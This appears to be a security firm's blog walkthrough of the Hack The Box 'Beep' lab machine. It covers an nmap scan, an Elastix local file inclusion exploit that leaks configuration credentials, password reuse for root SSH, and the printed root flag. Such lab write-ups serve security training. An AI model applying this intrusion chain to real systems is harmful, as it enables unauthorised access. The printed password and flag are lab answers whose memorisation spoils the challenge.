- Email: info@clearinfosec.com
- 1800 760 5656
Hello Friends, Today I am here with a new HTB machine.
This machine was pretty easy. The main goal is to get root flag.
Here we will be learning about a specific vulnerability called Local File Inclusion.
I didn’t use much of the tools to pwn this machine.
#nmap -sSV -T5 -p- 10.10.10.7 –allports
There are a lot of service running on the host
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Postfix smtpd
80/tcp open http Apache httpd 2.2.3
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
111/tcp open rpcbind 2 (RPC #100000)
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
443/tcp open ssl/https?
878/tcp open status 1 (RPC #100024)
993/tcp open ssl/imap Cyrus imapd
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp open upnotifyp?
4559/tcp open hylafax HylaFAX 4.3.10
5038/tcp open asterisk Asterisk Call Manager 1.1
10000/tcp open http MiniServ 1.570 (Webmin httpd)
I did a dirb scan to find the directories but before checking the ports and services, I did a quick google search about Elastix and its vulnerabilities. Then I came across this Local File inclusion in Elastix 2.2.0
So, what is a Local File Inclusion (LFI) vulnerability?
LFI is often found in poorly written web applications. These vulnerabilities occur when a web application allows the user to submit input into files or upload files to the server.
You can find more about LFI here https://www.offensive-security.com/metasploit-unleashed/file-inclusion-vulnerabilities/
I opened the exploit from Exploit DB and was going through the code. I found that it affects Vtiger CRM.
Here I checked whether this page has Vtiger CRM
Okay, now I probably found something interesting without using dirbuster. Here I can see the Vtiger CRM 5.1.0. Again, google is a savior here, I checked for Vtiger CRM exploit.
Before trying the Vtiger CRM SOAP exploit, I decided to use the Elastix LFI Exploit and see what result we get. I used the LFI exploit. I always wished not to use the Metasploit and pwn a vulnerable machine. So, this was my right chance.
After taking a glance at the page source I found ,
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
Now digging more at the source, I found something interesting “ jEhdIekWmdjE “
As you can see in the below screenshot, this password is mentioned in multiple places.
I didn’t want to spend any more time attempting to brute force usernames and passwords. Instead, I just picked up the password and tried my luck whether I would get SSH using this password.
#ssh root@10.10.10.7
But it threw an error
Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
So, I used the key exchange to resolve the issue
#ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 root@10.10.10.7
Finally, I got the root access…! Now, all I have to do is finding the flag
94812bd3b0622f1228481fdd9ea7054b- that’s the flag.
This was the first machine I pwned without using Metasploit.
Hint: You can still use Metasploit and do privilege escalation with Nmap